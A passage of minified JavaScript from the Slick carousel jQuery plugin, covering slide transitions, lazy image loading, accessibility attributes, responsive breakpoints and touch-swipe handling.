mouseleave.slick",e.swipeHandler),e.$list.off("click.slick",e.clickHandler),i(document).off(e.visibilityChange,e.visibility),e.cleanUpSlideEvents(),!0===e.options.accessibility&&e.$list.off("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&i(e.$slideTrack).children().off("click.slick",e.selectHandler),i(window).off("orientationchange.slick.slick-"+e.instanceUid,e.orientationChange),i(window).off("resize.slick.slick-"+e.instanceUid,e.resize),i("[draggable!=true]",e.$slideTrack).off("dragstart",e.preventDefault),i(window).off("load.slick.slick-"+e.instanceUid,e.setPosition)},e.prototype.cleanUpSlideEvents=function(){var e=this;e.$list.off("mouseenter.slick",i.proxy(e.interrupt,e,!0)),e.$list.off("mouseleave.slick",i.proxy(e.interrupt,e,!1))},e.prototype.cleanUpRows=function(){var i,e=this;e.options.rows>1&&((i=e.$slides.children().children()).removeAttr("style"),e.$slider.empty().append(i))},e.prototype.clickHandler=function(i){!1===this.shouldClick&&(i.stopImmediatePropagation(),i.stopPropagation(),i.preventDefault())},e.prototype.destroy=function(e){var t=this;t.autoPlayClear(),t.touchObject={},t.cleanUpEvents(),i(".slick-cloned",t.$slider).detach(),t.$dots&&t.$dots.remove(),t.$prevArrow&&t.$prevArrow.length&&(t.$prevArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),t.htmlExpr.test(t.options.prevArrow)&&t.$prevArrow.remove()),t.$nextArrow&&t.$nextArrow.length&&(t.$nextArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),t.htmlExpr.test(t.options.nextArrow)&&t.$nextArrow.remove()),t.$slides&&(t.$slides.removeClass("slick-slide slick-active slick-center slick-visible slick-current").removeAttr("aria-hidden").removeAttr("data-slick-index").each(function(){i(this).attr("style",i(this).data("originalStyling"))}),t.$slideTrack.children(this.options.slide).detach(),t.$slideTrack.detach(),t.$list.detach(),t.$slider.append(t.$slides)),t.cleanUpRows(),t.$slider.removeClass("slick-slider"),t.$slider.removeClass("slick-initialized"),t.$slider.removeClass("slick-dotted"),t.unslicked=!0,e||t.$slider.trigger("destroy",[t])},e.prototype.disableTransition=function(i){var e=this,t={};t[e.transitionType]="",!1===e.options.fade?e.$slideTrack.css(t):e.$slides.eq(i).css(t)},e.prototype.fadeSlide=function(i,e){var t=this;!1===t.cssTransitions?(t.$slides.eq(i).css({zIndex:t.options.zIndex}),t.$slides.eq(i).animate({opacity:1},t.options.speed,t.options.easing,e)):(t.applyTransition(i),t.$slides.eq(i).css({opacity:1,zIndex:t.options.zIndex}),e&&setTimeout(function(){t.disableTransition(i),e.call()},t.options.speed))},e.prototype.fadeSlideOut=function(i){var e=this;!1===e.cssTransitions?e.$slides.eq(i).animate({opacity:0,zIndex:e.options.zIndex-2},e.options.speed,e.options.easing):(e.applyTransition(i),e.$slides.eq(i).css({opacity:0,zIndex:e.options.zIndex-2}))},e.prototype.filterSlides=e.prototype.slickFilter=function(i){var e=this;null!==i&&(e.$slidesCache=e.$slides,e.unload(),e.$slideTrack.children(this.options.slide).detach(),e.$slidesCache.filter(i).appendTo(e.$slideTrack),e.reinit())},e.prototype.focusHandler=function(){var e=this;e.$slider.off("focus.slick blur.slick").on("focus.slick blur.slick","*",function(t){t.stopImmediatePropagation();var o=i(this);setTimeout(function(){e.options.pauseOnFocus&&(e.focussed=o.is(":focus"),e.autoPlay())},0)})},e.prototype.getCurrent=e.prototype.slickCurrentSlide=function(){return this.currentSlide},e.prototype.getDotCount=function(){var i=this,e=0,t=0,o=0;if(!0===i.options.infinite)if(i.slideCount<=i.options.slidesToShow)++o;else for(;e<i.slideCount;)++o,e=t+i.options.slidesToScroll,t+=i.options.slidesToScroll<=i.options.slidesToShow?i.options.slidesToScroll:i.options.slidesToShow;else if(!0===i.options.centerMode)o=i.slideCount;else if(i.options.asNavFor)for(;e<i.slideCount;)++o,e=t+i.options.slidesToScroll,t+=i.options.slidesToScroll<=i.options.slidesToShow?i.options.slidesToScroll:i.options.slidesToShow;else o=1+Math.ceil((i.slideCount-i.options.slidesToShow)/i.options.slidesToScroll);return o-1},e.prototype.getLeft=function(i){var e,t,o,s,n=this,r=0;return n.slideOffset=0,t=n.$slides.first().outerHeight(!0),!0===n.options.infinite?(n.slideCount>n.options.slidesToShow&&(n.slideOffset=n.slideWidth*n.options.slidesToShow*-1,s=-1,!0===n.options.vertical&&!0===n.options.centerMode&&(2===n.options.slidesToShow?s=-1.5:1===n.options.slidesToShow&&(s=-2)),r=t*n.options.slidesToShow*s),n.slideCount%n.options.slidesToScroll!=0&&i+n.options.slidesToScroll>n.slideCount&&n.slideCount>n.options.slidesToShow&&(i>n.slideCount?(n.slideOffset=(n.options.slidesToShow-(i-n.slideCount))*n.slideWidth*-1,r=(n.options.slidesToShow-(i-n.slideCount))*t*-1):(n.slideOffset=n.slideCount%n.options.slidesToScroll*n.slideWidth*-1,r=n.slideCount%n.options.slidesToScroll*t*-1))):i+n.options.slidesToShow>n.slideCount&&(n.slideOffset=(i+n.options.slidesToShow-n.slideCount)*n.slideWidth,r=(i+n.options.slidesToShow-n.slideCount)*t),n.slideCount<=n.options.slidesToShow&&(n.slideOffset=0,r=0),!0===n.options.centerMode&&n.slideCount<=n.options.slidesToShow?n.slideOffset=n.slideWidth*Math.floor(n.options.slidesToShow)/2-n.slideWidth*n.slideCount/2:!0===n.options.centerMode&&!0===n.options.infinite?n.slideOffset+=n.slideWidth*Math.floor(n.options.slidesToShow/2)-n.slideWidth:!0===n.options.centerMode&&(n.slideOffset=0,n.slideOffset+=n.slideWidth*Math.floor(n.options.slidesToShow/2)),e=!1===n.options.vertical?i*n.slideWidth*-1+n.slideOffset:i*t*-1+r,!0===n.options.variableWidth&&(o=n.slideCount<=n.options.slidesToShow||!1===n.options.infinite?n.$slideTrack.children(".slick-slide").eq(i):n.$slideTrack.children(".slick-slide").eq(i+n.options.slidesToShow),e=!0===n.options.rtl?o[0]?-1*(n.$slideTrack.width()-o[0].offsetLeft-o.width()):0:o[0]?-1*o[0].offsetLeft:0,!0===n.options.centerMode&&(o=n.slideCount<=n.options.slidesToShow||!1===n.options.infinite?n.$slideTrack.children(".slick-slide").eq(i):n.$slideTrack.children(".slick-slide").eq(i+n.options.slidesToShow+1),e=!0===n.options.rtl?o[0]?-1*(n.$slideTrack.width()-o[0].offsetLeft-o.width()):0:o[0]?-1*o[0].offsetLeft:0,e+=(n.$list.width()-o.outerWidth())/2)),e},e.prototype.getOption=e.prototype.slickGetOption=function(i){return this.options[i]},e.prototype.getNavigableIndexes=function(){var i,e=this,t=0,o=0,s=[];for(!1===e.options.infinite?i=e.slideCount:(t=-1*e.options.slidesToScroll,o=-1*e.options.slidesToScroll,i=2*e.slideCount);t<i;)s.push(t),t=o+e.options.slidesToScroll,o+=e.options.slidesToScroll<=e.options.slidesToShow?e.options.slidesToScroll:e.options.slidesToShow;return s},e.prototype.getSlick=function(){return this},e.prototype.getSlideCount=function(){var e,t,o=this;return t=!0===o.options.centerMode?o.slideWidth*Math.floor(o.options.slidesToShow/2):0,!0===o.options.swipeToSlide?(o.$slideTrack.find(".slick-slide").each(function(s,n){if(n.offsetLeft-t+i(n).outerWidth()/2>-1*o.swipeLeft)return e=n,!1}),Math.abs(i(e).attr("data-slick-index")-o.currentSlide)||1):o.options.slidesToScroll},e.prototype.goTo=e.prototype.slickGoTo=function(i,e){this.changeSlide({data:{message:"index",index:parseInt(i)}},e)},e.prototype.init=function(e){var t=this;i(t.$slider).hasClass("slick-initialized")||(i(t.$slider).addClass("slick-initialized"),t.buildRows(),t.buildOut(),t.setProps(),t.startLoad(),t.loadSlider(),t.initializeEvents(),t.updateArrows(),t.updateDots(),t.checkResponsive(!0),t.focusHandler()),e&&t.$slider.trigger("init",[t]),!0===t.options.accessibility&&t.initADA(),t.options.autoplay&&(t.paused=!1,t.autoPlay())},e.prototype.initADA=function(){var e=this,t=Math.ceil(e.slideCount/e.options.slidesToShow),o=e.getNavigableIndexes().filter(function(i){return i>=0&&i<e.slideCount});e.$slides.add(e.$slideTrack.find(".slick-cloned")).attr({"aria-hidden":"true",tabindex:"-1"}).find("a, input, button, select").attr({tabindex:"-1"}),null!==e.$dots&&(e.$slides.not(e.$slideTrack.find(".slick-cloned")).each(function(t){var s=o.indexOf(t);i(this).attr({role:"tabpanel",id:"slick-slide"+e.instanceUid+t,tabindex:-1}),-1!==s&&i(this).attr({"aria-describedby":"slick-slide-control"+e.instanceUid+s})}),e.$dots.attr("role","tablist").find("li").each(function(s){var n=o[s];i(this).attr({role:"presentation"}),i(this).find("button").first().attr({role:"tab",id:"slick-slide-control"+e.instanceUid+s,"aria-controls":"slick-slide"+e.instanceUid+n,"aria-label":s+1+" of "+t,"aria-selected":null,tabindex:"-1"})}).eq(e.currentSlide).find("button").attr({"aria-selected":"true",tabindex:"0"}).end());for(var s=e.currentSlide,n=s+e.options.slidesToShow;s<n;s++)e.$slides.eq(s).attr("tabindex",0);e.activateADA()},e.prototype.initArrowEvents=function(){var i=this;!0===i.options.arrows&&i.slideCount>i.options.slidesToShow&&(i.$prevArrow.off("click.slick").on("click.slick",{message:"previous"},i.changeSlide),i.$nextArrow.off("click.slick").on("click.slick",{message:"next"},i.changeSlide),!0===i.options.accessibility&&(i.$prevArrow.on("keydown.slick",i.keyHandler),i.$nextArrow.on("keydown.slick",i.keyHandler)))},e.prototype.initDotEvents=function(){var e=this;!0===e.options.dots&&(i("li",e.$dots).on("click.slick",{message:"index"},e.changeSlide),!0===e.options.accessibility&&e.$dots.on("keydown.slick",e.keyHandler)),!0===e.options.dots&&!0===e.options.pauseOnDotsHover&&i("li",e.$dots).on("mouseenter.slick",i.proxy(e.interrupt,e,!0)).on("mouseleave.slick",i.proxy(e.interrupt,e,!1))},e.prototype.initSlideEvents=function(){var e=this;e.options.pauseOnHover&&(e.$list.on("mouseenter.slick",i.proxy(e.interrupt,e,!0)),e.$list.on("mouseleave.slick",i.proxy(e.interrupt,e,!1)))},e.prototype.initializeEvents=function(){var e=this;e.initArrowEvents(),e.initDotEvents(),e.initSlideEvents(),e.$list.on("touchstart.slick mousedown.slick",{action:"start"},e.swipeHandler),e.$list.on("touchmove.slick mousemove.slick",{action:"move"},e.swipeHandler),e.$list.on("touchend.slick mouseup.slick",{action:"end"},e.swipeHandler),e.$list.on("touchcancel.slick mouseleave.slick",{action:"end"},e.swipeHandler),e.$list.on("click.slick",e.clickHandler),i(document).on(e.visibilityChange,i.proxy(e.visibility,e)),!0===e.options.accessibility&&e.$list.on("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&i(e.$slideTrack).children().on("click.slick",e.selectHandler),i(window).on("orientationchange.slick.slick-"+e.instanceUid,i.proxy(e.orientationChange,e)),i(window).on("resize.slick.slick-"+e.instanceUid,i.proxy(e.resize,e)),i("[draggable!=true]",e.$slideTrack).on("dragstart",e.preventDefault),i(window).on("load.slick.slick-"+e.instanceUid,e.setPosition),i(e.setPosition)},e.prototype.initUI=function(){var i=this;!0===i.options.arrows&&i.slideCount>i.options.slidesToShow&&(i.$prevArrow.show(),i.$nextArrow.show()),!0===i.options.dots&&i.slideCount>i.options.slidesToShow&&i.$dots.show()},e.prototype.keyHandler=function(i){var e=this;i.target.tagName.match("TEXTAREA|INPUT|SELECT")||(37===i.keyCode&&!0===e.options.accessibility?e.changeSlide({data:{message:!0===e.options.rtl?"next":"previous"}}):39===i.keyCode&&!0===e.options.accessibility&&e.changeSlide({data:{message:!0===e.options.rtl?"previous":"next"}}))},e.prototype.lazyLoad=function(){function e(e){i("img[data-lazy]",e).each(function(){var e=i(this),t=i(this).attr("data-lazy"),o=i(this).attr("data-srcset"),s=i(this).attr("data-sizes")||n.$slider.attr("data-sizes"),r=document.createElement("img");r.onload=function(){e.animate({opacity:0},100,function(){o&&(e.attr("srcset",o),s&&e.attr("sizes",s)),e.attr("src",t).animate({opacity:1},200,function(){e.removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading")}),n.$slider.trigger("lazyLoaded",[n,e,t])})},r.onerror=function(){e.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),n.$slider.trigger("lazyLoadError",[n,e,t])},r.src=t})}var t,o,s,n=this;if(!0===n.options.centerMode?!0===n.options.infinite?s=(o=n.currentSlide+(n.options.slidesToShow/2+1))+n.options.slidesToShow+2:(o=Math.max(0,n.currentSlide-(n.options.slidesToShow/2+1)),s=n.options.slidesToShow/2+1+2+n.currentSlide):(o=n.options.infinite?n.options.slidesToShow+n.currentSlide:n.currentSlide,s=Math.ceil(o+n.options.slidesToShow),!0===n.options.fade&&(o>0&&o--,s<=n.slideCount&&s++)),t=n.$slider.find(".slick-slide").slice(o,s),"anticipated"===n.options.lazyLoad)for(var r=o-1,l=s,d=n.$slider.find(".slick-slide"),a=0;a<n.options.slidesToScroll;a++)r<0&&(r=n.slideCount-1),t=(t=t.add(d.eq(r))).add(d.eq(l)),r--,l++;e(t),n.slideCount<=n.options.slidesToShow?e(n.$slider.find(".slick-slide")):n.currentSlide>=n.slideCount-n.options.slidesToShow?e(n.$slider.find(".slick-cloned").slice(0,n.options.slidesToShow)):0===n.currentSlide&&e(n.$slider.find(".slick-cloned").slice(-1*n.options.slidesToShow))},e.prototype.loadSlider=function(){var i=this;i.setPosition(),i.$slideTrack.css({opacity:1}),i.$slider.removeClass("slick-loading"),i.initUI(),"progressive"===i.options.lazyLoad&&i.progressiveLazyLoad()},e.prototype.next=e.prototype.slickNext=function(){this.changeSlide({data:{message:"next"}})},e.prototype.orientationChange=function(){var i=this;i.checkResponsive(),i.setPosition()},e.prototype.pause=e.prototype.slickPause=function(){var i=this;i.autoPlayClear(),i.paused=!0},e.prototype.play=e.prototype.slickPlay=function(){var i=this;i.autoPlay(),i.options.autoplay=!0,i.paused=!1,i.focussed=!1,i.interrupted=!1},e.prototype.postSlide=function(e){var t=this;t.unslicked||(t.$slider.trigger("afterChange",[t,e]),t.animating=!1,t.slideCount>t.options.slidesToShow&&t.setPosition(),t.swipeLeft=null,t.options.autoplay&&t.autoPlay(),!0===t.options.accessibility&&(t.initADA(),t.options.focusOnChange&&i(t.$slides.get(t.currentSlide)).attr("tabindex",0).focus()))},e.prototype.prev=e.prototype.slickPrev=function(){this.changeSlide({data:{message:"previous"}})},e.prototype.preventDefault=function(i){i.preventDefault()},e.prototype.progressiveLazyLoad=function(e){e=e||1;var t,o,s,n,r,l=this,d=i("img[data-lazy]",l.$slider);d.length?(t=d.first(),o=t.attr("data-lazy"),s=t.attr("data-srcset"),n=t.attr("data-sizes")||l.$slider.attr("data-sizes"),(r=document.createElement("img")).onload=function(){s&&(t.attr("srcset",s),n&&t.attr("sizes",n)),t.attr("src",o).removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading"),!0===l.options.adaptiveHeight&&l.setPosition(),l.$slider.trigger("lazyLoaded",[l,t,o]),l.progressiveLazyLoad()},r.onerror=function(){e<3?setTimeout(function(){l.progressiveLazyLoad(e+1)},500):(t.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),l.$slider.trigger("lazyLoadError",[l,t,o]),l.progressiveLazyLoad())},r.src=o):l.$slider.trigger("allImagesLoaded",[l])},e.prototype.refresh=function(e){var t,o,s=this;o=s.slideCount-s.options.slidesToShow,!s.options.infinite&&s.currentSlide>o&&(s.currentSlide=o),s.slideCount<=s.options.slidesToShow&&(s.currentSlide=0),t=s.currentSlide,s.destroy(!0),i.extend(s,s.initials,{currentSlide:t}),s.init(),e||s.changeSlide({data:{message:"index",index:t}},!1)},e.prototype.registerBreakpoints=function(){var e,t,o,s=this,n=s.options.responsive||null;if("array"===i.type(n)&&n.length){s.respondTo=s.options.respondTo||"window";for(e in n)if(o=s.breakpoints.length-1,n.hasOwnProperty(e)){for(t=n[e].breakpoint;o>=0;)s.breakpoints[o]&&s.breakpoints[o]===t&&s.breakpoints.splice(o,1),o--;s.breakpoints.push(t),s.breakpointSettings[t]=n[e].settings}s.breakpoints.sort(function(i,e){return s.options.mobileFirst?i-e:e-i})}},e.prototype.reinit=function(){var e=this;e.$slides=e.$slideTrack.children(e.options.slide).addClass("slick-slide"),e.slideCount=e.$slides.length,e.currentSlide>=e.slideCount&&0!==e.currentSlide&&(e.currentSlide=e.currentSlide-e.options.slidesToScroll),e.slideCount<=e.options.slidesToShow&&(e.currentSlide=0),e.registerBreakpoints(),e.setProps(),e.setupInfinite(),e.buildArrows(),e.updateArrows(),e.initArrowEvents(),e.buildDots(),e.updateDots(),e.initDotEvents(),e.cleanUpSlideEvents(),e.initSlideEvents(),e.checkResponsive(!1,!0),!0===e.options.focusOnSelect&&i(e.$slideTrack).children().on("click.slick",e.selectHandler),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),e.setPosition(),e.focusHandler(),e.paused=!e.options.autoplay,e.autoPlay(),e.$slider.trigger("reInit",[e])},e.prototype.resize=function(){var e=this;i(window).width()!==e.windowWidth&&(clearTimeout(e.windowDelay),e.windowDelay=window.setTimeout(function(){e.windowWidth=i(window).width(),e.checkResponsive(),e.unslicked||e.setPosition()},50))},e.prototype.removeSlide=e.prototype.slickRemove=function(i,e,t){var o=this;if(i="boolean"==typeof i?!0===(e=i)?0:o.slideCount-1:!0===e?--i:i,o.slideCount<1||i<0||i>o.slideCount-1)return!1;o.unload(),!0===t?o.$slideTrack.children().remove():o.$slideTrack.children(this.options.slide).eq(i).remove(),o.$slides=o.$slideTrack.children(this.options.slide),o.$slideTrack.children(this.options.slide).detach(),o.$slideTrack.append(o.$slides),o.$slidesCache=o.$slides,o.reinit()},e.prototype.setCSS=function(i){var e,t,o=this,s={};!0===o.options.rtl&&(i=-i),e="left"==o.positionProp?Math.ceil(i)+"px":"0px",t="top"==o.positionProp?Math.ceil(i)+"px":"0px",s[o.positionProp]=i,!1===o.transformsEnabled?o.$slideTrack.css(s):(s={},!1===o.cssTransitions?(s[o.animType]="translate("+e+", "+t+")",o.$slideTrack.css(s)):(s[o.animType]="translate3d("+e+", "+t+", 0px)",o.$slideTrack.css(s)))},e.prototype.setDimensions=function(){var i=this;!1===i.options.vertical?!0===i.options.centerMode&&i.$list.css({padding:"0px "+i.options.centerPadding}):(i.$list.height(i.$slides.first().outerHeight(!0)*i.options.slidesToShow),!0===i.options.centerMode&&i.$list.css({padding:i.options.centerPadding+" 0px"})),i.listWidth=i.$list.width(),i.listHeight=i.$list.height(),!1===i.options.vertical&&!1===i.options.variableWidth?(i.slideWidth=Math.ceil(i.listWidth/i.options.slidesToShow),i.$slideTrack.width(Math.ceil(i.slideWidth*i.$slideTrack.children(".slick-slide").length))):!0===i.options.variableWidth?i.$slideTrack.width(5e3*i.slideCount):(i.slideWidth=Math.ceil(i.listWidth),i.$slideTrack.height(Math.ceil(i.$slides.first().outerHeight(!0)*i.$slideTrack.children(".slick-slide").length)));var e=i.$slides.first().outerWidth(!0)-i.$slides.first().width();!1===i.options.variableWidth&&i.$slideTrack.children(".slick-slide").width(i.slideWidth-e)},e.prototype.setFade=function(){var e,t=this;t.$slides.each(function(o,s){e=t.slideWidth*o*-1,!0===t.options.rtl?i(s).css({position:"relative",right:e,top:0,zIndex:t.options.zIndex-2,opacity:0}):i(s).css({position:"relative",left:e,top:0,zIndex:t.options.zIndex-2,opacity:0})}),t.$slides.eq(t.currentSlide).css({zIndex:t.options.zIndex-1,opacity:1})},e.prototype.setHeight=function(){var i=this;if(1===i.options.slidesToShow&&!0===i.options.adaptiveHeight&&!1===i.options.vertical){var e=i.$slides.eq(i.currentSlide).outerHeight(!0);i.$list.css("height",e)}},e.prototype.setOption=e.prototype.slickSetOption=function(){var e,t,o,s,n,r=this,l=!1;if("object"===i.type(arguments[0])?(o=arguments[0],l=arguments[1],n="multiple"):"string"===i.type(arguments[0])&&(o=arguments[0],s=arguments[1],l=arguments[2],"responsive"===arguments[0]&&"array"===i.type(arguments[1])?n="responsive":void 0!==arguments[1]&&(n="single")),"single"===n)r.options[o]=s;else if("multiple"===n)i.each(o,function(i,e){r.options[i]=e});else if("responsive"===n)for(t in s)if("array"!==i.type(r.options.responsive))r.options.responsive=[s[t]];else{for(e=r.options.responsive.length-1;e>=0;)r.options.responsive[e].breakpoint===s[t].breakpoint&&r.options.responsive.splice(e,1),e--;r.options.responsive.push(s[t])}l&&(r.unload(),r.reinit())},e.prototype.setPosition=function(){var i=this;i.setDimensions(),i.setHeight(),!1===i.options.fade?i.setCSS(i.getLeft(i.currentSlide)):i.setFade(),i.$slider.trigger("setPosition",[i])},e.prototype.setProps=function(){var i=this,e=document.body.style;i.positionProp=!0===i.options.vertical?"top":"left","top"===i.positionProp?i.$slider.addClass("slick-vertical"):i.$slider.removeClass("slick-vertical"),void 0===e.WebkitTransition&&void 0===e.MozTransition&&void 0===e.msTransition||!0===i.options.useCSS&&(i.cssTransitions=!0),i.options.fade&&("number"==typeof i.options.zIndex?i.options.zIndex<3&&(i.options.zIndex=3):i.options.zIndex=i.defaults.zIndex),void 0!==e.OTransform&&(i.animType="OTransform",i.transformType="-o-transform",i.transitionType="OTransition",void 0===e.perspectiveProperty&&void 0===e.webkitPerspective&&(i.animType=!1)),void 0!==e.MozTransform&&(i.animType="MozTransform",i.transformType="-moz-transform",i.transitionType="MozTransition",void 0===e.perspectiveProperty&&void 0===e.MozPerspective&&(i.animType=!1)),void 0!==e.webkitTransform&&(i.animType="webkitTransform",i.transformType="-webkit-transform",i.transitionType="webkitTransition",void 0===e.perspectiveProperty&&void 0===e.webkitPerspective&&(i.animType=!1)),void 0!==e.msTransform&&(i.animType="msTransform",i.transformType="-ms-transform",i.transitionType="msTransition",void 0===e.msTransform&&(i.animType=!1)),void 0!==e.transform&&!1!==i.animType&&(i.animType="transform",i.transformType="transform",i.transitionType="transition"),i.transformsEnabled=i.options.useTransform&&null!==i.animType&&!1!==i.animType},e.prototype.setSlideClasses=function(i){var e,t,o,s,n=this;if(t=n.$slider.find(".slick-slide").removeClass("slick-active slick-center slick-current").attr("aria-hidden","true"),n.$slides.eq(i).addClass("slick-current"),!0===n.options.centerMode){var r=n.options.slidesToShow%2==0?1:0;e=Math.floor(n.options.slidesToShow/2),!0===n.options.infinite&&(i>=e&&i<=n.slideCount-1-e?n.$slides.slice(i-e+r,i+e+1).addClass("slick-active").attr("aria-hidden","false"):(o=n.options.slidesToShow+i,t.slice(o-e+1+r,o+e+2).addClass("slick-active").attr("aria-hidden","false")),0===i?t.eq(t.length-1-n.options.slidesToShow).addClass("slick-center"):i===n.slideCount-1&&t.eq(n.options.slidesToShow).addClass("slick-center")),n.$slides.eq(i).addClass("slick-center")}else i>=0&&i<=n.slideCount-n.options.slidesToShow?n.$slides.slice(i,i+n.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"):t.length<=n.options.slidesToShow?t.addClass("slick-active").attr("aria-hidden","false"):(s=n.slideCount%n.options.slidesToShow,o=!0===n.options.infinite?n.options.slidesToShow+i:i,n.options.slidesToShow==n.options.slidesToScroll&&n.slideCount-i<n.options.slidesToShow?t.slice(o-(n.options.slidesToShow-s),o+s).addClass("slick-active").attr("aria-hidden","false"):t.slice(o,o+n.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"));"ondemand"!==n.options.lazyLoad&&"anticipated"!==n.options.lazyLoad||n.lazyLoad()},e.prototype.setupInfinite=function(){var e,t,o,s=this;if(!0===s.options.fade&&(s.options.centerMode=!1),!0===s.options.infinite&&!1===s.options.fade&&(t=null,s.slideCount>s.options.slidesToShow)){for(o=!0===s.options.centerMode?s.options.slidesToShow+1:s.options.slidesToShow,e=s.slideCount;e>s.slideCount-o;e-=1)t=e-1,i(s.$slides[t]).clone(!0).attr("id","").attr("data-slick-index",t-s.slideCount).prependTo(s.$slideTrack).addClass("slick-cloned");for(e=0;e<o+s.slideCount;e+=1)t=e,i(s.$slides[t]).clone(!0).attr("id","").attr("data-slick-index",t+s.slideCount).appendTo(s.$slideTrack).addClass("slick-cloned");s.$slideTrack.find(".slick-cloned").find("[id]").each(function(){i(this).attr("id","")})}},e.prototype.interrupt=function(i){var e=this;i||e.autoPlay(),e.interrupted=i},e.prototype.selectHandler=function(e){var t=this,o=i(e.target).is(".slick-slide")?i(e.target):i(e.target).parents(".slick-slide"),s=parseInt(o.attr("data-slick-index"));s||(s=0),t.slideCount<=t.options.slidesToShow?t.slideHandler(s,!1,!0):t.slideHandler(s)},e.prototype.slideHandler=function(i,e,t){var o,s,n,r,l,d=null,a=this;if(e=e||!1,!(!0===a.animating&&!0===a.options.waitForAnimate||!0===a.options.fade&&a.currentSlide===i))if(!1===e&&a.asNavFor(i),o=i,d=a.getLeft(o),r=a.getLeft(a.currentSlide),a.currentLeft=null===a.swipeLeft?r:a.swipeLeft,!1===a.options.infinite&&!1===a.options.centerMode&&(i<0||i>a.getDotCount()*a.options.slidesToScroll))!1===a.options.fade&&(o=a.currentSlide,!0!==t?a.animateSlide(r,function(){a.postSlide(o)}):a.postSlide(o));else if(!1===a.options.infinite&&!0===a.options.centerMode&&(i<0||i>a.slideCount-a.options.slidesToScroll))!1===a.options.fade&&(o=a.currentSlide,!0!==t?a.animateSlide(r,function(){a.postSlide(o)}):a.postSlide(o));else{if(a.options.autoplay&&clearInterval(a.autoPlayTimer),s=o<0?a.slideCount%a.options.slidesToScroll!=0?a.slideCount-a.slideCount%a.options.slidesToScroll:a.slideCount+o:o>=a.slideCount?a.slideCount%a.options.slidesToScroll!=0?0:o-a.slideCount:o,a.animating=!0,a.$slider.trigger("beforeChange",[a,a.currentSlide,s]),n=a.currentSlide,a.currentSlide=s,a.setSlideClasses(a.currentSlide),a.options.asNavFor&&(l=(l=a.getNavTarget()).slick("getSlick")).slideCount<=l.options.slidesToShow&&l.setSlideClasses(a.currentSlide),a.updateDots(),a.updateArrows(),!0===a.options.fade)return!0!==t?(a.fadeSlideOut(n),a.fadeSlide(s,function(){a.postSlide(s)})):a.postSlide(s),void a.animateHeight();!0!==t?a.animateSlide(d,function(){a.postSlide(s)}):a.postSlide(s)}},e.prototype.startLoad=function(){var i=this;!0===i.options.arrows&&i.slideCount>i.options.slidesToShow&&(i.$prevArrow.hide(),i.$nextArrow.hide()),!0===i.options.dots&&i.slideCount>i.options.slidesToShow&&i.$dots.hide(),i.$slider.addClass("slick-loading")},e.prototype.swipeDirection=function(){var i,e,t,o,s=this;return i=s.touchObject.startX-s.touchObject.curX,e=s.touchObject.startY-s.touchObject.curY,t=Math.atan2(e,i),(o=Math.round(180*t/Math.PI))<0&&(o=360-Math.abs(o)),o<=45&&o>=0?!1===s.options.rtl?"left":"right":o<=360&&o>=315?!1===s.options.rtl?"left":"right":o>=135&&o<=225?!1===s.options.rtl?"right":"left":!0===s.options.verticalSwiping?o>=35&&o<=135?"down":"up":"vertical"},e.prototype.swipeEnd=function(i){var e,t,o=this;if(o.dragging=!1,o.swiping=!1,o.scrolling)return o.scrolling=!1,!1;if(o.interrupted=!1,o.shouldClick=!(o.touchObject.swipeLength>10),void 0===o.touchObject.curX)return!1;if(!0===o.touchObject.edgeHit&&o.$slider.trigger("edge",[o,o.swipeDirection()]),o.touchObject.swipeLength>=o.touchObject.minSwipe){switch(t=o.swipeDirection()){case"left":case"down":e=o.options.swipeToSlide?o.checkNavigable(o.currentSlide+o.getSlideCount()):o.currentSlide+o.getSlideCount(),o.currentDirection=0;break;case"right":case"up":e=o.options.swipeToSlide?o.checkNavigable(o.currentSlide-o.getSlideCount()):o.currentSlide-o.getSlideCount(),o.currentDirection=1}"vertical"!=t&&(o.slideHandler(e),o.touchObject={},o.$slider.trigger("swipe",[o,t]))}else o.touchObject.startX!==o.touchObject.curX&&(o.slideHandler(o.currentSlide),o.touchObject={})},e.prototype.swipeHandler=function(i){var e=this;if(!(!1===e.options.swipe||"ontouchend"in document&&!1===e.options.swipe||!1===e.options.draggable&&-1!==i.type.indexOf("mouse")))switch(e.touchObject.fingerCount=i.originalEvent&&void 0!==i.originalEvent.touches?i.originalEvent.touches.length:1,e.touchObject.minSwipe=e.listWidth/e.options.touchThreshold,!0===e.options.verticalSwiping&&(e.touchObject.minSwipe=e.listHeight/e.options.touchThreshold),i.data.action){case"start":e.swipeStart(i);break;case"move":e.swipeMove(i);break;case"end":e.swipeEnd(i)}},e.prototype.swipeMove=function(i){var e,t,o,s,n,r,l=this;return n=void 0!==i.originalEvent?i.originalEvent.touches:null,!(!l.dragging||l.scrolling||n&&1!==n.length)&&(e=l.getLeft(l.currentSlide),l.touchObject.curX=void 0!==n?n[0].pageX:i.clientX,l.touchObject.curY=void 0!==n?n[0].pageY:i.clientY,l.touchObject.swipeLength=Math.round(Math.sqrt(Math.pow(l.touchObject.curX-l.touchObject.startX,2))),r=Math.round(Math.sqrt(Math.pow(l.touchObject.curY-l.touchObject.startY,2))),!l.options.verticalSwiping&&!l.swiping&&r>4?(l.scrolling=!0,!1):(!0===l.options.verticalSwiping&&(l.touchObject.swipeLength=r),t=l.swipeDirection(),void 